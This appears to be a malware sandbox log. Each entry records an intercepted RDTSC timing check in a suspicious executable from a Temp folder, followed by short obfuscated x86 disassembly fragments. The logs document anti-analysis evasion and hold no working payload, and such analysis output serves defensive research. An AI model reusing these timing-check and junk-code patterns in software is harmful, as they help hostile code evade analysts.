                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C08C9 second address: 53C08CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C08CD second address: 53C08D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C08D3 second address: 53C08F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00BE2014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F343555F55Bh 0x00000024 push FFFFFFFEh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007F3430D3ED3Bh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C08F7 second address: 53C08FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C08FC second address: 53C09BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F3430D3ED46h 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007F343555F596h 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a call 00007F3430D3ED3Eh 0x0000001f mov dh, cl 0x00000021 pop edx 0x00000022 pushfd 0x00000023 jmp 00007F3430D3ED3Ch 0x00000028 adc ecx, 39880888h 0x0000002e jmp 00007F3430D3ED3Bh 0x00000033 popfd 0x00000034 popad 0x00000035 xchg eax, ebp 0x00000036 jmp 00007F3430D3ED46h 0x0000003b push eax 0x0000003c pushad 0x0000003d mov dx, 4D94h 0x00000041 pushfd 0x00000042 jmp 00007F3430D3ED3Dh 0x00000047 add eax, 62C71E56h 0x0000004d jmp 00007F3430D3ED41h 0x00000052 popfd 0x00000053 popad 0x00000054 xchg eax, ebp 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jmp 00007F3430D3ED43h 0x0000005d mov ax, D3AFh 0x00000061 popad 0x00000062 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370026 second address: 5370043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370043 second address: 53700D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx eax, bx 0x0000000f pushfd 0x00000010 jmp 00007F3430D3ED49h 0x00000015 add si, D786h 0x0000001a jmp 00007F3430D3ED41h 0x0000001f popfd 0x00000020 popad 0x00000021 and esp, FFFFFFF8h 0x00000024 pushad 0x00000025 mov al, C9h 0x00000027 pushfd 0x00000028 jmp 00007F3430D3ED49h 0x0000002d xor ax, FF96h 0x00000032 jmp 00007F3430D3ED41h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F3430D3ED3Dh 0x00000041 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53700D8 second address: 53700DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53700DE second address: 53700E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53700E2 second address: 53700E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53700E6 second address: 537015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3430D3ED46h 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 mov ah, 40h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 call 00007F3430D3ED40h 0x0000001d pop ebx 0x0000001e push eax 0x0000001f mov edi, 368BA290h 0x00000024 pop ebx 0x00000025 popad 0x00000026 mov dword ptr [esp], ebx 0x00000029 jmp 00007F3430D3ED44h 0x0000002e mov ebx, dword ptr [ebp+10h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F3430D3ED47h 0x00000038 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 537015B second address: 5370199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3430D3497Ch 0x00000011 xor al, FFFFFF98h 0x00000014 jmp 00007F3430D3497Bh 0x00000019 popfd 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370199 second address: 5370216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 4F6Bh 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F3430D3ED41h 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 push edi 0x00000013 mov edi, ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a pushad 0x0000001b pushad 0x0000001c mov edi, 14C66940h 0x00000021 call 00007F3430D3ED49h 0x00000026 pop eax 0x00000027 popad 0x00000028 mov edi, 7D96DC34h 0x0000002d popad 0x0000002e push edx 0x0000002f jmp 00007F3430D3ED48h 0x00000034 mov dword ptr [esp], edi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F3430D3ED3Dh 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370216 second address: 537029B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34987h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F3430D34986h 0x00000010 je 00007F34A2D72D42h 0x00000016 jmp 00007F3430D34980h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 pushad 0x00000023 movzx esi, dx 0x00000026 jmp 00007F3430D34983h 0x0000002b popad 0x0000002c je 00007F34A2D72D23h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F3430D34985h 0x00000039 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 537029B second address: 53702F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [esi+44h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F3430D3ED47h 0x00000017 xor ecx, 2A5E275Eh 0x0000001d jmp 00007F3430D3ED49h 0x00000022 popfd 0x00000023 call 00007F3430D3ED40h 0x00000028 pop eax 0x00000029 popad 0x0000002a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53702F6 second address: 5370388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 pushfd 0x00000007 jmp 00007F3430D34983h 0x0000000c or cl, 0000001Eh 0x0000000f jmp 00007F3430D34989h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 or edx, dword ptr [ebp+0Ch] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F3430D34983h 0x00000024 sub ah, 0000002Eh 0x00000027 jmp 00007F3430D34989h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F3430D34980h 0x00000033 sub al, FFFFFFA8h 0x00000036 jmp 00007F3430D3497Bh 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370388 second address: 5370445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3430D3ED3Fh 0x00000009 sbb cx, 16EEh 0x0000000e jmp 00007F3430D3ED49h 0x00000013 popfd 0x00000014 call 00007F3430D3ED40h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test edx, 61000000h 0x00000023 jmp 00007F3430D3ED41h 0x00000028 jne 00007F34A2D7CFD9h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F3430D3ED43h 0x00000037 and eax, 355F925Eh 0x0000003d jmp 00007F3430D3ED49h 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007F3430D3ED40h 0x00000049 adc cx, 4658h 0x0000004e jmp 00007F3430D3ED3Bh 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53607E8 second address: 5360820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34982h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007F3430D34980h 0x00000010 push eax 0x00000011 jmp 00007F3430D3497Bh 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5360820 second address: 5360842 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 2133h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov cx, F5A1h 0x00000010 mov dx, si 0x00000013 popad 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov si, dx 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5360842 second address: 5360892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F3430D34980h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007F3430D34980h 0x00000017 sub ebx, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3430D3497Ch 0x00000020 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5360892 second address: 53608CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3430D3ED41h 0x00000009 or esi, 72C11E96h 0x0000000f jmp 00007F3430D3ED41h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test esi, esi 0x0000001a pushad 0x0000001b movsx ebx, ax 0x0000001e push eax 0x0000001f push edx 0x00000020 mov dl, ah 0x00000022 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53608CC second address: 53608EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F34A2D7A433h 0x0000000b pushad 0x0000000c mov ebx, eax 0x0000000e movzx eax, bx 0x00000011 popad 0x00000012 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov bh, 46h 0x0000001e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53608EA second address: 53609B2 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F3430D3ED47h 0x0000000d and cx, 45DEh 0x00000012 jmp 00007F3430D3ED49h 0x00000017 popfd 0x00000018 popad 0x00000019 mov ecx, esi 0x0000001b pushad 0x0000001c push eax 0x0000001d call 00007F3430D3ED43h 0x00000022 pop eax 0x00000023 pop edi 0x00000024 pushfd 0x00000025 jmp 00007F3430D3ED46h 0x0000002a jmp 00007F3430D3ED45h 0x0000002f popfd 0x00000030 popad 0x00000031 je 00007F34A2D84769h 0x00000037 jmp 00007F3430D3ED3Eh 0x0000003c test byte ptr [77436968h], 00000002h 0x00000043 jmp 00007F3430D3ED40h 0x00000048 jne 00007F34A2D84751h 0x0000004e pushad 0x0000004f call 00007F3430D3ED3Eh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53609B2 second address: 53609BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53609BB second address: 5360A1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edx, dword ptr [ebp+0Ch] 0x0000000d pushad 0x0000000e mov esi, 7C798FC3h 0x00000013 call 00007F3430D3ED48h 0x00000018 mov esi, 59277821h 0x0000001d pop esi 0x0000001e popad 0x0000001f push ebx 0x00000020 pushad 0x00000021 mov edi, ecx 0x00000023 call 00007F3430D3ED44h 0x00000028 mov dx, ax 0x0000002b pop esi 0x0000002c popad 0x0000002d mov dword ptr [esp], ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov edx, eax 0x00000035 push ecx 0x00000036 pop ebx 0x00000037 popad 0x00000038 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5360A1D second address: 5360A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370DD8 second address: 5370DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370DDE second address: 5370E4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ax, 3041h 0x0000000e pushfd 0x0000000f jmp 00007F3430D3497Eh 0x00000014 jmp 00007F3430D34985h 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007F3430D34981h 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F3430D3497Eh 0x00000027 mov ebp, esp 0x00000029 jmp 00007F3430D34980h 0x0000002e pop ebp 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 mov dh, ah 0x00000034 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370E4B second address: 5370E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370C15 second address: 5370C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370C1B second address: 5370C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5370C1F second address: 5370C23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53F0724 second address: 53F0728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53F0728 second address: 53F072E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53F072E second address: 53F075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F3430D3ED3Ah 0x0000000b jmp 00007F3430D3ED45h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53F075E second address: 53F0762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53F0762 second address: 53F0768 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53F0768 second address: 53F07BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 pushfd 0x00000006 jmp 00007F3430D3497Ch 0x0000000b sub al, FFFFFF88h 0x0000000e jmp 00007F3430D3497Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F3430D3497Bh 0x00000022 adc ah, FFFFFFCEh 0x00000025 jmp 00007F3430D34989h 0x0000002a popfd 0x0000002b mov bx, si 0x0000002e popad 0x0000002f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53F07BE second address: 53F07FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3430D3ED46h 0x00000013 add al, FFFFFFA8h 0x00000016 jmp 00007F3430D3ED3Bh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0A41 second address: 53E0A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0A45 second address: 53E0A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0A4B second address: 53E0AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3430D3497Ah 0x00000009 adc ecx, 51F8C968h 0x0000000f jmp 00007F3430D3497Bh 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d call 00007F3430D34981h 0x00000022 call 00007F3430D34980h 0x00000027 pop ecx 0x00000028 pop ebx 0x00000029 mov ax, 3537h 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 mov edi, esi 0x00000035 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0AA2 second address: 53E0ACD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3430D3ED42h 0x00000008 add si, 6158h 0x0000000d jmp 00007F3430D3ED3Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E08E9 second address: 53E08F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bl, ah 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E08F9 second address: 53E08FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E08FD second address: 53E0910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3497Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0910 second address: 53E0915 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0915 second address: 53E091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E091B second address: 53E0931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3430D3ED3Ch 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0931 second address: 53E0937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0937 second address: 53E093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E093B second address: 53E093F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E093F second address: 53E094F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E094F second address: 53E0955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53801AF second address: 53801DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3430D3ED3Ch 0x00000011 rdtsc
